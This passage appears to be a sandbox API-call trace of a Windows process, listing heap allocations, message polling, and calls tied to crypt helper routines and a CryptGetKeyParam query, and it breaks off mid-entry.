RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0196.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.866] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0196.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0196.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.866] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0196.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.867] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0196.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.868] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0196.869] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0196.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.870] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0196.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0196.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0196.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0196.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0196.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0196.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0196.873] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2678, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2678*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.874] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.874] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 